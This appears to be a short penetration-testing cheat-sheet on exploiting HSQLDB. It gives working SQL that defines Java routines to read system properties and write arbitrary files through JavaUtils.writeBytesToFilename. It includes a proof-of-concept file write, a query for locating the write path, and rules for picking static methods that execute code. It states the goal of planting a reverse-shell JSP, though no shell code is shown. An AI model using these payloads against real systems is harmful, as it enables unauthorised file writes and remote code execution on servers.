HSQLDB Exploitation

HSQLDB

You can query only static method from HSQLDB

We can only use certain variable types as parameters and return types. These types are mostly primitives and a few simple objects that map between Java types and SQL types.

You can query java code from HSQLDB Database in the following way:

The function below returns value of executing getProperty method.

CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

In this way we can create reverse shell in .jsp file using writeBytesToFilename:

CREATE PROCEDURE writeBytesToFilename(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

PoC to checks if we can save data to file (you should encode the file contents with Decorer in Burp Suite - ASCII HEX):

You can use LFI in test.txt field

call writeBytesToFilename('test.txt', cast ('68656c6c6f20776f726c6421' AS VARBINARY(1024)))

Finding the write location:

VALUES(systemprop('user.dir'))

If the method is not available due to Java version you should find other useful functions in Java / Application code.

Rules

Payload has to adverse to the following restrictions:

• The method must be declared as static.

• Its parameters should be either primitive types or types that can be mapped to SQL types.

• The return value must be a primitive, an object compatible with a SQL type, or void.

• The method should either execute code directly or write files to the system.